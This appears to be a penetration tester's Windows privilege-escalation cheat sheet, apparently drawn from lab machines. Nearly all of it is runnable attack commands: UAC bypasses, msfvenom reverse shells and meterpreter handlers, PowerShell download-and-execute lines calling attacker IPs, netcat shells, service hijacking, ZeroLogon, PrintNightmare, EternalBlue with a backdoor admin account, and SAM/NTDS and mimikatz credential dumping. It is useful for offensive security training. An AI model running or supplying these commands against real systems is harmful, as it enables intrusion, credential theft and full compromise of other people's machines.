PrivilageEsc Windows 👑
Check list : https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Click here for more !! PayloadsAllTheThings
01. Common Tricks
01.1 UAC Bypass
DLL Hijacking UAC Bypass. (SystemPropertiesAdvanced.exe) Click here for more!
## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!
## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack
## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
### If you get any error saying "This operation requires an interactive window".
### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter)
## ------------------| Use with interactive shell
### Create payload and gain shell using following methord
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
01.2 If you have, in or can?
AlwaysInstallElevated
check
## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
## From the output that the registry named “AlwaysInstallElevated” exists
## with a dword (REG_WORD) value of 0x1,
## which means that the AlwaysInstallElevated policy is enabled.
## Any user can run msi file.
## ------------------| Exploit
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi
## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
If we are in
LOCAL SERVICE
orNETWORK SERVICE
## ------------------| How to check
whoami /all
## nt authority\local service <--
## ------------------| Check advance priv
wget https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe
## Upload this in to the machine
.\FullPowers.exe
If you have
SeDebugPrivilege
?
## ------------------| How to check
whoami /priv
## Check if we have SeDebugPrivilege,
## ------------------| If it's Disabled, then enable
### Using Enable-Privilege.ps1 (may not work if you are in remote connection)
wget https://raw.githubusercontent.com/proxb/PoshPrivilege/master/PoshPrivilege/Scripts/Enable-Privilege.ps1
IEX(New-Object Net.WebClient).downloadString('http://<IP>/Enable-Privilege.ps1')
Enable-Privilege -Privilege SeDebugPrivilege
## .Net v2.0
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/RunasCs/DotNet-v2.0/RunasCs.exe
## .Net v4.0
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/RunasCs/DotNet-v4.0/RunasCs.exe
RunasCs.exe <UserName> <Password> cmd -r <IP>:4545
## and then type powershell and check whoami /priv
## ------------------| If it's Enabled
### Try to use meterpreter and migrate it to admin process
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; exploit"
getprivs ## check if we have SeDebugPrivilege
### then run the .\h4rithd.exe
### and then search any system or administrator process [winlogon.exe]
migrate <PID>
### Or if you get the shell from psexec or evil-winrm
wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
IEX(New-Object Net.WebClient).downloadString('http://<IP>/psgetsys.ps1')
ImpersonateFromParentPid -ppid <PID> -command "cmd.exe" -cmdargs "/c ping <IP"
SeBackupPrivilege
andSeRestorePrivilege
has?
## ------------------| How to check is enabled
whoami /priv | findstr "SeBackupPrivilege SeRestorePrivilege"
## ------------------| Copy those SYSTEM Hives to current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
#### Then we need to copy Active Directory Domain Database also known as ntds.dit
## ------------------| Create diskshadow script on local
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
## ------------------| Convert the script to Windows format and upload it.
unix2dos script.txt
## ------------------| Use Diskshadow to backup C drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:
## ------------------| Use robocopy to backup the E:\Windows\ntds\ntds.dit file.
robocopy /B E:\Windows\ntds\ .\ ntds.dit
# Then download all SAM, SYSTEM and NTDS.DIT file then you can use secretsdump.py to get admini hash
## ------------------| Using wbadmin.exe
## Use archival smb on samba
## smb share and the share needs to be formated as NTFS/ReFS. follow below commands to do so.
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./
echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
If you has
SeLoadDriverPrivilege
?
## ------------------| Download and upload following files to machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe
## ------------------| Create payload and upload
msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # Must need, then start listner
.\ExploitCapcom.exe
If you have
ExecuteDCOM
membership?
## ------------------| Using Impacket
impacket-dcomexec <USER>:'<PASS>'@<IP> 'ping -n 2 <IP>' -object MMC20 -shell-type cmd -silentcommand
## ------------------| Using NetExec
nxc smb $IP -u <USER> -p '<PASS>' --exec-method mmcexec -x 'ping -n 2 <IP>'
If the user is in
DnsAdmins
group?
## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll
## ------------------| Create SMB share on local machine
impacket-smbserver share ./
## ------------------| Do this on owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Create netcat listner and then
sc.exe start dns
If you have
GenericAll
on user jorden
## ------------------| Enable PreAuth for user Jorden
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true
## ------------------| Then run this
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass
If you have
GenericWrite
on any services
## ------------------| Check the command
sc.exe
## ------------------| If it is succcess then Exploit [Space must]
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""
sc.exe stop UsoSVC
sc.exe config UsoSVC start=auto
sc.exe start UsoSVC
If you have
xp_dirtree
?
## Turn on responder
sudo responder -i tun0
## Execute
sqlcmd -Q "xp_dirtree \\YourIP\test"
## Get the NTLM hash and crack with
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
If you are on
Azure Admins
group?
## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/
## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
If you are in member of
Event Log Readers
group.
wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')
# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*
# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName
# Command line process login (A new process has been created)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap
## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
If you are on
WSUS Administrators
group? SharpWSUS
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait for 5-6 minutes
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
If you are member of
Administrators
group, but still stuck?
## List Administrators group members
net localgroup Administrators
## Use this simple methord to bypass UAC
net use h: \\127.0.0.1\c$
h:
dir
If you are in
LAPS_Readers
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\windows\temp\laps.csv" -NoTypeInformation
Hijacking/Migrating login sessions.
## ------------------| Check who are logged into the machine, what sessions are available?
tasklist /v
## ------------------| Get into a session
## Create payload
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Search explorer.exe; becouse it's more stable then copy the PID value
migrate <PID>
01.3 Service / Registry Exploits
## ------------------| Enumarations [Must have SERVICE_START & SERVICE_STOP permissions]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
## ------------------| Check Permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Check BUILTIN\Users:(I)(F) permission
## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>
## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
## Set automactic start
sc config <service_name> start= auto
## Remove dependancy
sc config <service_name> depend= ""
## ------------------| Restart service
cmd
wmic service where caption="<ServiceName> get name, caption, state, startmode
## if StartMode is Auto
## Check if we have restart machine privilages
whoami /priv
Insecure Service Executables
## ------------------| Check
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
## ------------------| Exploit
## Backup origianl one then replace with shell.exe
## Start the service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
## ------------------| Intro
C:\Program Files\One Folder\Two Folder\Executable.exe
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\A Subfolder\Two Folder\Executable.exe
## ------------------| Check unqoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v "'"
## ------------------| Check if we have
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
### Write permission [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwcqv -uwdq <path>
## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name>
sc STOP <service_name>
sc START <service_name>
Weak Registry Permissions
## ------------------| Verify [Check for RW NT AUTHORITY\INTERACTIVE]
Get-Acl HKLM:\<ServicePath>\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM:\<ServicePath>\<ServiceName>
## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>
## ------------------| Check Current values [ImagePath & ObjectName == LocalSystem]
reg query HKLM:\<ServicePath>\<ServiceName>
## ------------------| Add new value
reg add HKLM:\<ServicePath>\<ServiceName> /v ImageaPath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f
net start <service_name>
02. Tools
02.1 PowerUp
## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')"
## ------------------| Best check
Invoke-AllChecks
CurrentUserTokenGroupSid
Get-RegistryAutoLogon
## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'
# Download
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1
# Upload
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')
# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20
02.3 Seatbelt
# Run ALL enumeration checks
Seatbelt.exe -group=all
02.4 SecretsDump
## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local
## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161
# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank
# aad3b435b51404eeaad3b435b51404ee <-- blank [LM]
## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local
## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
03. Common Exploits
03.0 GodPotato (New)
## ------------------| Download
#### .Net4
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe -O GodPotato.exe
#### .Net3.5
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe -O GodPotato.exe
#### .Net2
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe -O GodPotato.exe
## ------------------| Exploit
.\GodPotato.exe -cmd "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA=="
03.0 JuicyPotatoNG (New)
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! 👌👌👌
## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip
unzip JuicyPotatoNG.zip
## ------------------| After upload it on victim's machine create bat file
echo "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==" > shell.bat
type C:\programdata\shell.bat
## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat
03.1 Juicy Potato (Abusing the golden privileges)
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! 👌👌👌
## ------------------| Create .bat script
## Shell through Netcat
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through Powershell
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')
## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100
## ------------------| Execute
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337
## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
Click here to view CLSIDs
## ------------------| Run Chisel to bind port 9999
chisel server --reverse --port 1337 ## From Our end
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## From Attackers end
## ------------------| Run socat to catch 135
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## From Our end
## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999
03.3 MultiPotato
## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe
## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"
## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser
## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
03.4 PrintSpoofer
# !!! Microsoft Visual C++ Redistributable Must installed
.\PrintSpoofer.exe -i -c "C:\\<PATH>\shell.exe"
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179
# if exploit complte,
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179
# Now you can login with this
# '$' is used for machine account
impacket-psexec [email protected] -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0
## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f
C:\Windows\System32\fodhelper.exe
## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
03.7 Serviio Insecure File Permissions
## ------------------| Enumarations
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)
## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio
## or
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## Disabled OK
shutdown /r /t 0
03.8 PrintNightmare
## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN
## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD> -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare
## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>
03.9 EternalBlue (MS17-010)
## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP
## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe
## ------------------| Method I
python send_and_execute.py <IP> rev.exe
## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>
03.10 Misconfigured Certificate Template
## --------------------| Using Certipy-Ad
sudo apt install certipy-ad
## To find vulnerable certificate templates
certipy-ad find -u <USER> -p <Password> -dc-ip <IP>
certipy-ad find -u <USER>@<DOMAIN> -p <Password> -dc-ip <IP>
## Exploit
certipy-ad req '<USER>@<DOMAIN>:<Password>@<IP>' -ca '<CA Name>' -template '<Template Name>' -alt 'administrator@<Domain>'
certipy-ad auth -pfx administrator.pfx -dc-ip <IP> -username Administrator -domain <Domain>
impacket-psexec administrator@<IP> -hashes <HASH>:<HASH>
## --------------------| Using Certify.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Certify/Certify.exe
./certify.exe find /vulnerable
./certify.exe request /ca:<CA Name> /template:<Template Name> /altname:Administrator
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
## --------------------| Methord II
./certify.exe find /vulnerable
impacket-addcomputer <Domain>/<Username>:'<Password>!' -computer-name 'HD$' -computer-pass 'Password123!'
ntpdate -s <IP>
certipy-ad req -u 'HD$' -p 'Password123!' -ca <CA Name> -target <Domain> -template <Template Name> -upn administrator@<Domain> -dns <Domain> -dc-ip <IP>
certipy-ad cert -pfx administrator_authority.pfx -nokey -out user.crt
certipy-ad cert -pfx administrator_authority.pfx -nocert -out user.key
wget https://raw.githubusercontent.com/AlmondOffSec/PassTheCert/main/Python/passthecert.py
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain <Domain> -dc-ip $IP
## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py
## ------------------| Download latest definitions
./wes.py --update
./wes.py -u
## ------------------| Download latest version of WES-NG
./wes.py --update-wes
## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt
## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt
## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv
## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017
## ------------------| Determine vulnerabilies filtering out out vulnerabilities of KBs that have been published before the publishing date of the most recent KB installed
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d
## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip
## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"
## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical
## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup
03.11 Windows Kernel Exploits
**Download all the Binary Files from : **https://github.com/SecWiki/windows-kernel-exploits
Microsoft Windows - Local Privilege Escalation (MS15-051)
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
USBPcap
Null Pointer Dereference Privilege Escalation (CVE-2017-6178)
USBPcap
Null Pointer Dereference Privilege Escalation (CVE-2017-6178)## ------------------| Information
# Date - 07th March 2017
# Discovered by - Parvez Anwar (@parvezghh)
# Vendor Homepage - http://desowin.org/usbpcap/
# Tested Version - 1.1.0.0 (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version - 1.1.0.0 - USBPcap.sys
# Tested on OS - 32bit Windows 7 SP1
# Vendor fix url - not yet
# Fixed Version - 0day
# Fixed driver ver - 0day
## ------------------| Check Vulnerable Version
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"
## ------------------| Exploit
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe -c exploit.exe exploit.c
./exploit.exe
## ------------------| Information
## Vulnerable Versions
## Windows 11 21H2, clfs.sys version 10.0.22000.1574
## Windows 10 21H2, Windows 10 22H2, Windows 11 22H2 and Windows server 2022
## ------------------| Exploit
## for all archs
wget https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/raw/master/exploit.exe
## for 64 bit
wget https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/raw/master/x64/Release/exploit.exe
.\exploit.exe <Token Offset> <Flag> <Program to execute>
.\exploit.exe 1208 1 calc.exe
04. Mimikatz
More command available at here!
Dump all user's
ntlm
hashes usinglsass
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out
## ------------------| If you have lsass as Mini DuMP or Rekall
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
Set password for account
.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
Decrypt EFS files. [source]
## ------------------| Get file's Certificate Thumbprint value
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## Also you can get this using following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name
## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"
## Download the *.der file to your machine.
## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"
## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
